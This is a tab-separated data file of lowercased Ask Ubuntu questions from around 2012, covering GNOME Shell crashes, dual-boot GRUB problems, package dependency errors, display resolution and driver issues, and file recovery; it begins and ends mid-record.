/usr/share/gnome-shell/js/ui/tweener.js:218 wrapper ( ) @ /usr/share/gjs-1.0/lang.js:204 ( ) @ /usr/share/gjs-1.0/lang.js:145 ( ) @ /usr/share/gjs-1.0/lang.js:239 init ( ) @ /usr/share/gnome-shell/js/ui/tweener.js:49 init ( ) @ /usr/share/gnome-shell/js/ui/environment.js:96 @ < main > :1 '' ' window manager warning : log level 32 : execution of main.js threw exception : typeerror : object 0x7fc748129c30 is not a subclass of ( null ) , it 's a xō note : everywhere it says `` it 's a xō '' , xō is actually garbled and changes every time ( i 'm thinking memory corruption ? ) this error is thrown by line 96 of /usr/share/gnome-shell/js/ui/environment.js : tweener.init ( ) did a purge of fglrx-legacy , reboot , reinstall fglrx-legacy , reboot ... same thing . did a ppa-purge of ppa : gnome3-team/gnome3 , and reinstalled gnome-shell and ubuntu-desktop from the standard repositores ... same thing . i 'm really at a loss here . i love gnome-shell and after using it for nearly a year now gnome classic just seems so archaic . additional information apt log from the day i first suspended my machine ( these are upgrades from the gnome3-team/gnome3 ppa and ubuntu-wine/ppa ppa ) : start-date : 2012-11-24 17:30:28 commandline : aptdaemon role='role-commit-packages ' sender=':1.618' install : gkbd-capplet : amd64 ( 3.6.0-0ubuntu1 ) , gnome-control-center-unity : amd64 ( 1.0-0ubuntu1~ubuntu12.10.1 ) upgrade : nautilus : amd64 ( 3.6.2-0ubuntu0.1~quantal1 , 3.6.3-0ubuntu2~ubuntu12.10.1 ) , libgnome-control-center1 : amd64 ( 3.4.2-0ubuntu19 , 3.6.3-0ubuntu6~ubuntu12.10.1 ) , wine1.5-i386 : i386 ( 1.5.17-0ubuntu4 , 1.5.18-0ubuntu1 ) , wine1.5 : amd64 ( 1.5.17-0ubuntu4 , 1.5.18-0ubuntu1 ) , gnome-settings-daemon : amd64 ( 3.4.2-0ubuntu14 , 3.6.3-0ubuntu1~ubuntu12.10.1 ) , gnome-control-center-data : amd64 ( 3.4.2-0ubuntu19 , 3.6.3-0ubuntu6~ubuntu12.10.1 ) , gnome-accessibility-themes : amd64 ( 3.6.0.2-0ubuntu1 , 3.6.2-0ubuntu2~ubuntu12.10.1 ) , gnome-themes-standard : amd64 ( 3.6.0.2-0ubuntu1 , 3.6.2-0ubuntu2~ubuntu12.10.1 ) , wine1.5-amd64 : amd64 ( 1.5.17-0ubuntu4 , 1.5.18-0ubuntu1 ) , nautilus-data : amd64 ( 3.6.2-0ubuntu0.1~quantal1 , 3.6.3-0ubuntu2~ubuntu12.10.1 ) , gnome-control-center : amd64 ( 3.4.2-0ubuntu19 , 3.6.3-0ubuntu6~ubuntu12.10.1 ) , libnautilus-extension1a : amd64 ( 3.6.2-0ubuntu0.1~quantal1 , 3.6.3-0ubuntu2~ubuntu12.10.1 ) end-date : 2012-11-24 17:31:32 fglrxinfo ( driver appears to be working ) : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 4650 opengl version string : 3.3.11653 compatibility profile context does anybody have any further ideas ?
222015	windows 7 not booting from ubuntu 12.10 boot menu	am having windows 7 in one hard drive . i installed ubuntu in second hard drive . am configured bios to boot second hard drive first ( ubuntu os ) . and then i updated grub , so its shows windows 7 in the boot list . i can boot in to ubuntu , but i ca n't boot into windows 7 , its shows error a disk read error occured press ctrl+alt+del to restart . then am configured bios again to load windows 7 first , it shows windows 7 and ubuntu in the boot list , windows 7 is working , but i ca n't boot into ubuntu.. help to solve this problem.. i want dual boot from any one of the drive ...
222017	how to share files/media online	can someone can direct me to a how to that explains not only how to install an ftp but also how a family member on another coast can access this via online ? i have setup an old computer with the intent of sharing movies/music/photos with family members not in my house . i have been searching for over an hour and can not find a complete guide from installation through user/folder setup to access via a computer not on the same network . any assistance in this matter would be eternally appreciated .
222023	fresh install , update and x-windows no longer working after login 12.10	i just recently installed desktop 12.10 on laptop , all was working fine logged in and it stated it wanted to update as it found updates . naturally i let it update and it asked me to reboot to use the new updates did that , now it boots fine i get login prompt . login as per normal then all i get is background with nothing else , if i turn off the wireless i get the disconnection notification pop up but i have nothing else on screen any wrror messages gets displayed as well but their is nothing . their was one program that failed that no longer prompts which gives options of reloading or just closing and continuing either way it just look like it hangs i can ctrl alt del to log out and it does that fine but still wont load no mater how many times i try saw a topic about a ati driver playing up which he typed the following in a ty which i can get to all of them as well . export display=:0 ; gnome-shell -- replace the answer i got back was the program gnome-shell is not installed you can install it by typing sudo apt-get install gnome-shell i also tried sudo pkill x which did nothing any help would be appreciated thanks gnome shell was not installed - installed gnome-shell and this has not made any difference to the issue . i have looked into this as my machine was running while unattended i saw that there was an error that could have something to do with this issue . the error goes as follows : system program problem detected the application compiz has closed unexpectedly /usr/bin/compiz compiz-core 1:0.9.8.4+bzr3407-0ubuntu1 crash compiz crashed with sigsegv in xcb_glx_get_string_string_length ( ) i uninstalled the gnome-shell as i wanted to revert back to original interface gui then uninstalled the compiz-core ( sudo apt-get remove compiz-core ) i re-installed compiz-core ( sudo apt-get install compiz-core ) rebooting to check outcome
222024	dns update for domain is not visible in my ubuntu pc	4 days ago i changed my domain 's nameservers . and after 2 days domain migrated to new hosting . but my computer ( ubuntu 12.04 ) is still opening old hosting when enter to my site . it is very strange . i checked with proxy tunnel sites , result : everything is ok . i asked to friends to check , result : everything is ok . but only my laptop opens an old hosting , not new one . i tried with different browsers+did f5 and ctrl+f5 i cleared cache . i changed my network public dns to google public dns and restarted ubuntu networking . but still no result . same old hosting opens . what else can i do ?
222027	rough guide on how to partition when installing ubuntu 12.10	i was wondering if someone could give a rough guide on how to partition my desktop . i have a 512 gb ssd and 2 tb sata hdd . the computer runs on 32 gb ram and an i7 processor . the computer is for general purpose and if anyone could detail how i should divide my partitions and where i should mount them i would appreciate it .
222028	krusader ca n't go into archives	i installed krusader to my ubuntu from repos with `` apt-get install '' and it work fine except one thing - i can not enter in any archives . while trying to do so it says - `` listing folders is not supported for protocol kio_krarc '' . in settings/archives tab i see `` zip '' and anything else selected . i clicked `` auto configure '' and see those archives are `` enabled '' but still have no luck . i ca n't imagine normal work without going into archives . can i somehow fix this ?
222029	ubuntu 12.10 language help !	for some weird reason language settings have gone awry and the os language changed for some random reason from english to chinese/japanese . ( i do not have a slightest idea why ; keyboard is finnish/scandinavic . ) any help concerning how to switch the language setting back to english much appreciated !
222030	get flash memory type : slc or mlc	just for my knowledge , i would like to know whether the type of flash memory used in my pendrive is slc or mlc . is there a way to find it out ? i googled but found nothing .
222031	power usb at certain cpu temperature	i have an unusual server set-up . basically , i have a combination of salvaged parts from 3 powerbook g4s running a non-graphical distribution of lubuntu . problem is , i 'm better with hardware than the software side of things . i 'm powering a usb fan ( as all other connectors are gone ) that i want to turn on when the cpu reaches a certain temperature . eventually i 'll install a proper temperature sensor , but for now that will have to do . i 'm sure there 's a simple script i could write for this which could run in the background monitoring the temperature and enabling power to the usb port . any ideas ? suggestions ?
222035	why am i getting so many errors ?	i have had ubuntu 12.10 installed for about two hours now . google chrome has crashed about fourteen times , i 've gotten two 'ubuntu 12.10 internal error ' messages , the software center is not working properly , and ubuntu tweak has crashed on me at least twice ( in three uses of it ) . all i did was install ubuntu 12.10 . i did literally nothing else but install a few applications ( skype , tweak , ccsm , chrome , chromium ) . i have n't changed any important files , and i have n't tweaked anything but some aesthetics . can anyone please help me ? i do n't even know what information might be helpful here , but if you ask for it i will give it . thanks , andrew
222043	ctrl + r alternative for guake	i have been a heavy user of reverse-search-history ( ctrl+r ) functionality in gnome-terminal ( default terminal client in ubuntu ) . recently i started using guake drop-down terminal in my system . loved guake for its easy access , but could n't find any revere-search-history functionality or key-mapping for it . is there such a thing available for guake , or is there any workaround solutions for it ?
222044	is it worthy upgrading to 12.10 from 12.04 for a web developer ?	in the interest of most web developers , who wish to upgrade to 12.10 from 12.04 but for most , the preventing factors are like - 12.10 is not an lte release . need clarifications here - what support and benefits exactly do canonical provide for web developer community as an lte release ? is it worthy considering lte or going for an upgrade . there are enough stories of users breaking their system after the upgrade to 12.10 . why are the upgrades not seamless ? it should work without breaking the system , like one click upgrades , and not re-installs every 6months . thanks , a web developer who loves ubuntu12+ .
222045	unity launcher accordion effect does not work	how to activate unity launcher accordion effect ? actually luncher has scrolling effect . thanks . answer to the question : log out , in the `` log in '' options select ubuntu and not ubuntu 2d ( ubuntu 2d does not support accordion effect ) . back to the problem , i realised when i log in as ubuntu it is switching to ubuntu 2d i think there is problem with my graphic card driver . i did try gnome 3 environment , the same problem i can not log in gnome only gnome classic . it is new asus eee 1225c ubuntu 12.04 lts preinstalled netbook . actually it is ubuntu desktop certified ( tested ) hardware but it does not work . http : //www.ubuntu.com/certification/hardware/201203-10695/ please help .
222046	battery died when updating from 12.04 to 12.10	i started the update and went to sleep but i forgot to plugin ac adapter . when i woke up , laptop was off . i plugged in the ac cord and turned it on . ubuntu boots and it is on 12.10 but may items are missing and neither gnome nor unity seem to work properly . it 's also very slow and freezes sometimes . is there a way to correct all those issues ? or revert back to 12.04 then re update to 12.10 without losing my data ?
222049	shortcut keys to launch gvim	i am using unity i added the shortcut to open gvim , using keyboard- > shortcuts- > custom shortcuts so now ctrl+g opens gvim , i want to launch it in a way that the selected file is opened in gvim after the command the launch command currently is gvim i want the command to be like gvim [ filename ] where filename is the name of the file which is selected in the open explorer window . that is i want to achieve the exact effect of the `` open with gvim '' menu button which we get when one right clicks on a file , only using a keyboard shortcut . thanks .
222051	zotac zbox nano	does anybody use ubuntu on zotac zbox nano ? is it possible , what is working and what is not ? how about playing h.264 1080p video packaged in mkv ? is remote control working ?
222055	windows 8 and ubuntu 12.10	i have asus n56vz with installed windows 8 in it . i want install ubuntu 12.10 , i install it but ca n't see grub when system start . how to install ubuntu near windows 8 and see grub on start ? well i find the way how to run linux on asus n56vz with windows 8 dual boot . create flash drive with ubuntu 12.10 boot from flash and start install when i should select how to install ubuntu , i do n't select ubuntu with windows 8 , i select other partition your hard disk , select swap area and root area grub install into /dev/sda after installation i see grub , but i ca n't boot into windows from it into bios i see new partiotion for boot , i select windows uefi ... and boot into windows install easy bcd latest version - or me it 2.2 beta create windows boot loader and leave only windows 8 and 30 seconds for wait well , how that works - when i reboot i see windows boot loader with one os - windows 8 , and if i want run windows i press enter and run it . if i want boot to ubuntu into windows boot loader i press esc and i see grub with ubuntu . and i run ubutnu . that 's it .
222057	flickering on youtube	all the videos on youtube are flickering on my ubuntu . see screenshot : http : //imgur.com/51dak this happens with html5 enabled and disabled . i am running ubuntu 12.10 on a thinkpad x61s . this only happens on google chrome .
222066	are these system specifications sufficient for upgrading to ubuntu 12.10 from windows 7 starter ?	i was just concerned with ubuntu 12.10 upgrading from my acer aspire one aod270 netbook . 320gb hdd 1gb ddr3 memory 1.6ghz intel atom n2600 processor with these system specifications , will the system work fine with ubuntu ( and much faster than windows 7 starter ) ? i do n't want to have a slow computer and i 'm hoping this will be enough . or will i have to go for ubuntu 10.04 ? i also want to make sure my laptop wo n't have any bios errors or problems , so i 'd like to know if there are any known problems with it .
222070	global menu not showing in ubuntu 12.10 with unity	i am on ubuntu 12.10 with unity shell . i am not quite sure what happened , but today i noticed that the menubar ( containing 'file , edit , etc ... ' ) is not appearing on the panel as it used to ( i.e . the global application menu ) , but on the application window under the title bar . the only application that still uses global menu is chromium . any ideas what settings may have changed ? also , when i right click on the desktop and select `` change desktop background '' , system settings opens , instead of the `` appearance '' settings . apparently , here is a related question , with no answer : global menu and hud suddenly broken edit : i noticed this behavior on three of my computers after an update ( i do not remember exactly which packages were updated ) . now when i try to run apt-get upgrade , i get : the following packages have been kept back : gnome-control-center gnome-control-center-data i guess something is going on with updates . any info would be appreciated .
222072	save changes when running from usb .	basically , what i need to know is how do i save any changes i make when running lubuntu from a usb drive ? my computer has no hard drive and so i have been booting lubuntu in 'try lubuntu before installing ' mode as a workaround . unfortunately when i reboot my computer , any changes i 've made are wiped ; and this includes absolutely everything such as downloads , packages , chromium extensions and system settings . i 'm sure this is because the hard drive is missing , but is n't it possible to save the data to another usb drive instead ? how do i overcome this issue and get my computer working properly again ? thanks !
222075	how do i shift the dash to bottom in ubuntu 12.10 ?	i would like to move the dash in my ubuntu 12.10 to the bottom . i dont see any setting panel in ubuntu . is there any code available for it ?
222078	is there debug.exe equivalent for linux ?	is there a windows debug.exe equivalent where i can write machine code and see what results they have after execution ?
222079	ca n't install libpcap0.8-dev : i386 to compile 32bit app under 64bit environment	i am writing a little program which uses libpcap and my target machine is i386 , while my dev machine is x86_64 . now , when i install libpcap0.8 : i386 , which works , i get under /usr/lib/i386_linux_gnu/ libpcap.so.0.8 and libpcap.so.1.1.1 but not libpcap.so i installed libpcap0.8-dev on a 32bit vm and it seems like this package contains the symlink libpcap.so when i want to compile my program with -m32 -l/usr/lib/i386_linux_gnu/ -lpcap that just wo n't work , because it ca n't find the library ( obviously ) . so i have to use ugly hacks like specifying the version with -l : lipcap.so.1.1.1 or by creating a symlink manually . trying to install libpcap0.8-dev : i386 gives me dependency hell ( open : 65 ; closed : 238 ; defer : 25 ; conflict : 40 ) . so is there a beautiful way to fix this , in a way using the package system how it 's supposed to work , or do i need to stick with my ugly hacks . or is this a bug and i should file a report ?
222082	workspace shifter hot-keys	i do n't know if it 's just me , or my installation , but i set f9-f12 for all four of my ubuntu workspaces , and it works until the 3rd boot up . every 3 times i turn my laptop on i have to reset just the workspace shifter hotkeys , volume ( up & down ) stay set , so does everything else . how do i fix this , and what is wrong with my ubuntu ? it only started happening when i upgraded from 12.04 to 12.10
222085	add dependency from ppa to package	i'am building simple dropdown terminal emulator application with pythongi + gtk+3.0 , i am using libkeybinder3.0 and gir1.2-keybinder3.0 packages for global keybinding these packages not available in default repository , they had special ppa . i dont want to say my users here is my ppa install my application and here is another ppa for dependencies , how can i merge these packages with my project . can i upload these 2 packages to my apllication 's ppa , because i thought launchpad dont let you mirror packages to your ppa ? or how can i link dependencies with my package so user can install only one ppa ?
222089	how to mantain an `` scp session '' open ?	i massively use scp and ssh for work . i 'm a little bored to insert the password everytime usually i scp many files from term and i was wondering if there is a way to mantain open the scp connection . i mean , it would be great if there is something like this : $ scp user @ server # to estabilsh the connection user @ server 's password : $ scp file1 user @ server : /folder # no password asked ! $ scp close # to close the connection
222090	can not install skype due to dependency errors ; dpkg does n't install dependencies	i 'm trying to install the newest skype version ( 4.1 ) on my linux . i have downloaded the skype-ubuntu-lucid_4.1.0.20-1_i386.deb package from the official skype site . i removed all installed versions including the configuration files . now when i try to install the downloaded package , i get the following errors : unpacking skype : i386 ( from skype-debian_4.1.0.20-1_i386.deb ) ... dpkg : dependency problems prevent configuration of skype : i386 : skype : i386 depends on libqt4-network ( > = 4:4.8.0 ) ; however : version of libqt4-network : i386 on system is 4:4.7.4-0ubuntu8.2 . skype : i386 depends on libqtgui4 ( > = 4:4.8.0 ) ; however : version of libqtgui4 : i386 on system is 4:4.7.4-0ubuntu8.2 . skype : i386 depends on libqtwebkit4 ( > = 2.1.0~2011week13 ) ; however : dpkg : error processing skype : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : skype : i386 now i thought : i can install the missing dependencies manually , but trying this i got dependency errors again . it seems that dependencies of a package are not downloaded and installed automatically . is there a command option for dpkg so that missing dependencies are installed automatically ?
222091	java problem in 12.04	my os is 12.04 and i am running it on my laptop . whenever i install or remove a software from the software centre i receive the error below . can anyone show me how to fix it ? location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-11-26 16:02:34 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to proxy.iisc.ernet.in ( proxy.iisc.ernet.in ) |10.16.40.14|:3128 ... connected . proxy request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-x64.tar.gz' 0k ... .. 100 % 1.87m=0.003s 2012-11-26 16:02:35 ( 1.87 mb/s ) - `./jdk-7u3-linux-x64.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up icedtea-netx-common ( 1.2-2ubuntu1.3 ) ... setting up icedtea-netx ( 1.2-2ubuntu1.3 ) ... update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/itweb-settings to provide /usr/bin/itweb-settings ( itweb-settings ) in auto mode . errors were encountered while processing : oracle-java7-installer error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 )
222092	multiple passwords on one account	i 'd like to join three ideas into one interesting and sometimes useful feature . there was a question about using multiple passwords earlier this year , but it did n't receive much attention . i 'd like to ask the question again after showing an interesting and new way to use the feature . the three original posts i found to be interestingly combined were : ( 1 ) multiple passwords per user ( 2 ) http : //blog.littleimpact.de/index.php/2009/09/14/automatic-encryption-of-home-directories-using-truecrypt-62-and-pam_exec/ ( 3 ) http : //www.truecrypt.org/docs/hidden-volume basically i 'd like to login to my account with two passwords and depending on the password i use , i would get a different content in my home directory . in a way i would get a cryptographically hidden account into my system . so the question is , is it possible to allow multiple passwords to log on to ubuntu/linux for the same user ?
222095	problem with audio sharing between different programs	i 've been using linux for quite some time , but until now i 've never run into any problems . i also saw the thread `` sound , stopping between multiple programs '' , but it is referring to a very old version ... my problem is that when i run diablo 3 ( using playonlinux ) and skype 4 at the same time , i only get audio from the program that i start first . if i start skype first and then diablo 3 , i have perfekt audio in skype and sometimes i might hear a faint whisper of the diablo sounds ... this problem started after i changed motherboard to asus p8z77-v pro with 16gb memory and intel i7 3770k cpu . with the old motherboard , all this worked just fine . the os is ubuntu 12.04 . i have only installed wine , playonlinux , skype 4 , and diablo 3 . all of the latest version , as far as i know . what should i do ? what do you need to know , in order to be able to help ? thanks /lasse
222098	how to install gfortran package on ubuntu 12.04 offline pc	i have downloaded gfortran package from there site and now looking for installing it on the offline ubuntu 12.04 pc ... please do n't close this question stating possible duplicate . i am looking for steps to install the package by extracting and installing it . i do n't want to use get-offline neither keryx nor to use some other online ubuntu systems . i am very much clear.. i have the downloaded package and i am looking forward for the steps to install the package with out accessing internet . thanks !
222107	upgrading to 12.10 on an external hard drive	i did some googling on this and did n't find anything specific for my situation . i currently have 12.04 installed on an external usb hard drive . it 's working great . i want to upgrade it to 12.10 . my bandwidth is very limited so i have a friend who will download 12.10 for me and put it on a flash stik . then i can upgrade without having to do the download myself . which particular version of the 12.10 download file ( s ) should i get ? are there alternate 12.10 downloads that have all the packages ? how do i set it up so when i upgrade 12.04 i can specify that it look in some local repository for the 12.10 files ? can i just dump the 12.10 files in some local directory ? or do i have do go thru some complex commands to create a local repository ? i 'm pretty new to linux so a long process of complex terminal commands will probably be a show stopper for me . remember that my 12.04 install resides on an external hard drive . and i have a laptop with multiple usb ports . thanks ! advait
222109	my system is broken i guess -- issues with libqt4-test	so here 's the problem , every time i try to install a package , i receive an error that says : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqt4-test : breaks : libqt4-test : i386 ( ! = 4:4.8.1-0ubuntu4.3 ) but 4:4.8.1-0ubuntu4.2 is to be installed libqt4-test : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.3 is to be installed breaks : libqt4-test ( ! = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.3 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . then , when i call sudo apt-get -f install , i receive this error : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libpgm-5.1-0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libqt4-test : i386 the following packages will be upgraded : libqt4-test : i386 1 upgraded , 0 newly installed , 0 to remove and 43 not upgraded . 2 not fully installed or removed . need to get 0 b/61.7 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libqt4-test : i386 ( -- configure ) : libqt4-test : i386 4:4.8.1-0ubuntu4.2 can not be configured because libqt4-test : amd64 is in a different version ( 4:4.8.1-0ubuntu4.3 ) dpkg : error processing libqt4-test ( -- configure ) : libqt4-test : amd64 4:4.8.1-0ubuntu4.3 can not be configured because libqt4-test : i386 is in a different version ( 4:4.8.1-0ubuntu4.2 ) no apport report written because maxreports is reached already errors were encountered while processing : libqt4-test : i386 libqt4-test e : sub-process /usr/bin/dpkg returned an error code ( 1 ) does anyone have any ideas as to how i might find my way out of this dilemma ?
222113	arm-none-linux-gnueabi-gcc : permission denied error	i 'm using ubuntu 12.10 x64 i 'm facing problem in permission , i have installed sourcery codebench and when i access it like arm-none-linux-gnueabi-gcc -v it says root/opt/arm-eabi-4.4.3/bin/arm-none-linux-gnueabi-gcc : permission denied while the same code is running in ubuntu 11.10 x32 please help ! !
222114	can i recover the files in the directory /usr from a btrfs snapshot ?	some time ago , i moved the folder /usr to its own partition . before this it had lived in the / partition which has a btrfs filesystem . accidentally , i formatted my /usr partition from my windows xp os . using an xubuntu livecd , i can see there are three snapshots , two of which contain my old /usr . i am wondering if i can recover my /usr from the snapshots taken by btrfs ? can i just copy the contents of the snapshot to /usr ?
222116	fstab not used in kubuntu 12.04 lts	it 's sounds rediculious but i fonud that kubuntu 12.04 does n't use fstab anymore . ti assure you i suggest to perform an experiment : press `` alt+f1 '' > `` system settings '' > `` removable devices '' . there you shoud enable automatic mounting of removable media ( choose any partition you like ) . restart you computer open : `` /media '' folder with `` dolphin '' to ensure that the selected partition has been mounted . now look in to your `` fstab '' file could anybody explain why there is no record in fstab while partition is mounted automaticaly ?
222117	is it possible to connect to already running session on xubuntu 12.04 machine ?	previously i was connecting to my xubuntu machine1 by running on it vnc server first and then using vnc client on machine2 to connect to machine1 . the problem is that i had to login anew to my desktop , so i got new x11 session , i believe . i would like to connect to my already running x11 session if it 's running . is it possible to do that ? if yes , than what should i do ? thanks in advance .
222119	ubuntu 12.10 - how to set the resolution to 1024x768 and correct rate ? using command line when ever system starts	i have this following code where my vga output is always showing out of range . how can i resolve it ? $ cvt 1024 768 $ xrandr -- newmode shvga 74.50 1024 1072 1176 1328 768 771 775 798 $ xrandr -- addmode vga-1 shvga $ xrandr -- output vga-1 -- mode shvga i also applied xrandr -- output vga-1 -- mode shvga -- rate 60 or 70 but none is helping . any permanent solution ? follow up : ( reference : http : //grenage.com/xorg.html )
222129	are there any 802.11ac adapters working in ubuntu ?	has anyone got an 802.11ac adapter working in linux/ubuntu ? pci or usb . looks like the a6200 might be having issues . and according to wikidev , it 's the only released piece of client hardware for 802.11ac .
222130	problem with ubuntu 12.10 and hardware	i have computer based on main board m4a785td-m evo . i am using graphics card from the main board . my problem - ubuntu freezes and it should be restared by either shutdown or by resent button . no key combinations work . no keyboard , no mouse - dead machine . and every time it freezes should be shutdown or reset it . after few times of shutting down or reset the machine can not be booted . not even e picture appeared on the screen . i carry it to the service shop but when we switched it on it starts without a problem . ones computer was bios broken - may be with reason multiple shutdown . so i think problem appears only when computer works actively with software . ubuntu is only os on the computer so i have n't tested with windows . i like ubuntu and do not to switch to windows . i have installed nvidia drivers but not nvidia-173 ( i have the option to install the former ) since at the end of the process it informs it can not find drivers for nvidia-173 and exits . could you please advice me if the problem is with graph card or anything else . i am willing to change the graph card but with what ? please advice me what graph card is the best for ubuntu . please help me . kosta
222132	does apt-cacher change packages access time ?	i tried to remove the long time unused packages from apt-cacher archive using find : $ find /var/cache/apt-cacher -atime +5 -type f -name `` . *deb* '' | wc -l 8471 $ find /var/cache/apt-cacher -atime +9 -type f -name `` . *deb* '' | wc -l 2269 $ find /var/cache/apt-cacher -atime +10 -type f -name `` . *deb* '' | wc -l 0 can i depend on the `` access time '' for apt-cacher archive usage ? that is , does `` access time '' change only when package get received by the user ? we are using apt-cacher for more than 6 months .
222137	how to install tor ( web browser ) in ubuntu 12.10 ?	i would like to install the tor , but i 'm having some problems . i know that someone will say `` this question is a exactly duplication of how to install tor ? `` , but it 's not , because the another question can not be applied to ubuntu 12.10 as the deb command is not available anymore . i did a research and even at the tor 's official website the available resource can not be applied to ubuntu 12.10 . i tried to use the deb command ( as the above question says : deb http : //deb.torproject.org/torproject.org < distribution > main ) and the terminal says deb : command not found and when i try to install it says e : unable to locate package deb . i 've also tried to use the ppa : ubun-tor , but it 's not compatible with quantal quetzal , because it 's too old . i 've also tried to use sudo apt-get install tor , but browser icon do n't shows up after installation and if you try to use the command tor in the terminal i get the following error message : nov 26 10:59:25.731 [ notice ] tor v0.2.3.22-rc ( git-4a0c70a817797420 ) running on linux . nov 26 10:59:25.731 [ notice ] tor ca n't help you if you use it wrong ! learn how to be safe at https : //www.torproject.org/download/download # warning nov 26 10:59:25.731 [ notice ] read configuration file `` /etc/tor/torrc '' . nov 26 10:59:25.737 [ notice ] initialized libevent version 2.0.19-stable using method epoll ( with changelist ) . good . nov 26 10:59:25.737 [ notice ] opening socks listener on 127.0.0.1:9050 nov 26 10:59:25.737 [ warn ] could not bind to 127.0.0.1:9050 : address already in use . is tor already running ? nov 26 10:59:25.737 [ warn ] failed to parse/validate config : failed to bind one of the listener ports . nov 26 10:59:25.737 [ err ] reading config failed -- see warnings above . thanks in advance .
222138	videos with lubuntu and libreoffice	i have a presentation with a video in it ( .ogg ) . while it works really well on my regular desktop ( unity ) , on my 4-years old laptop with lubuntu installed libreoffice can not play the video , it just stays white . however , i can still play the file in gnome mplayer . any idea on the codec i need to install or something ?
222141	how do i recover the pictures and videos ?	i had four ntfs partitions on my drive . one on which windows 7 was installed ( c drive ) and the other contained my data ( d drive ) ( e drive ) ( f drive ) . during ubuntu installation i chose to install ubuntu and erase my existing os . when ubuntu was installed , i was shocked to see no partition . all my data was gone . i must have done something wrong in selecting my option during installation . well i actually tried testdisk in my other pc with the hard drive . i messed up with the thing i deleted the ubuntu and made a single partition . is there any way i can recover my d drive ? i do n't care about the other partition i just need my pictures and videos which i captured . i have almost all computer equipment so just name it thanks in advance .
222145	repairing ubuntu	situation i have ubuntu 12.10 , i have a lot of important files in it . they are about 120gb . problem my ubuntu operating system is about to crash . crashing experience sometimes the whole screens goes white . sometimes the apps crashes , about every software have a chance to crash even terminal . sometimes the whole screen hangs what i want i want to a repair that can repair all my softwares or only repair my operating system so that i can maintain my files . i want my os to be back to the stable state no more crashes
222151	can not view windows xp in boot menu	i have windows xp and win 7 and ubuntu 12 installed in different partitions . but i am able to boot to ubuntu and windows 7 but can not see windows xp partions in boot menu . please help me to add it in ubuntu boot menu .
222156	pidgin installation has missing dependencies	i am a new user of ubuntu and i realized that i might have installed a broken pidgin . when i initiate to install pidgin program from software center , a message box appear saying `` package dependencies can not be resolved '' and its details are as follows : the following packages have unmet dependencies : pidgin : depends : libgtkspell0 ( > = 2.0.10 ) but it is not going to be installed depends : liblaunchpad-integration1 ( > = 0.1.17 ) but it is not going to be installed depends : libxss1 but it is not going to be installed depends : perlapi-5.14.2 but it is a virtual package add on : now when i install google-chrome-stable_current_i386.deb using ubuntu software centre , there is an error message stating : dependency is not satisfiable : libxss1
222158	wubi not working on 64-bit i5 second generation intel	dear fellows , i have faced a problem of installing ubunto 12.10 on my 64-bit intel laptop and gave me this message after rebooting the device and i didnt know what to do windows failed to start file : \ubuntu\winboot\wubildr.mbr status : 0xc000000e application could not load . corrupt or missing . so can you help me please solve this problem to install it via wubi ?
222159	both 64-bit and 32-bit support for development purposes	i 'm looking for directions to complete in the most convenient way ( well at least without lots of troubles ) set up as in subject . i need ( probably ) : 64 bit platform for running 64-bit vmware win7 image ( ideally 64-bit as maybe it can be pulled off with 32-bit ) however on it ( platform ) musts to be able to compile 32-bit code and some internal development tools and libs ( including some commercial debugger ) and run those with different than original libs ( like switching to custom-build 32-bit lib instead of native 64-bit ) it ( platform ) needs to be able to crosscompile arm builds with 32-bit version of tools and libs java ( probably both 64-bit and 32-bit ) - as some internal tools are build around eclipse i 'm looking for directions how to set up 64-bit box which will allow me to get there relatively easy . if everything fails i will probably try 32-bit but i would like to be able to get some benefits of 64-bit platform - like virtualization . any help is greatly appreciated .
222164	error in mid-installation of ubuntu .	i get an error message saying : sorry , ubuntu 12.10 has experienced an internal error . when clicking on details , it shows : executable path : /usr/lib/ubiquity/bin/ubiquity
222167	unity window effects/animations very slow on ubuntu 12.10 with radeon hd 6770 ( 3 monitors )	i 've installed 12.10 with the proprietary radeon drivers and am spanning a desktop across three monitors : $ dpkg -l fg* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-================-=============-=============-====================================== ii fglrx 2:9.000-0ubun amd64 video driver for the amd graphics acce ii fglrx-amdcccle 2:9.000-0ubun amd64 catalyst control center for the amd gr un fglrx-amdcccle-u < none > ( no description available ) un fglrx-control < none > ( no description available ) un fglrx-control-qt < none > ( no description available ) ii fglrx-dev 2:9.000-0ubun amd64 video driver for the amd graphics acce un fglrx-driver < none > ( no description available ) un fglrx-driver-dev < none > ( no description available ) un fglrx-glx < none > ( no description available ) un fglrx-kernel-sou < none > ( no description available ) un fglrx-modaliases < none > ( no description available ) un fglrx-updates < none > ( no description available ) un fglrx-updates-de < none > ( no description available ) $ cat /etc/x11/xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 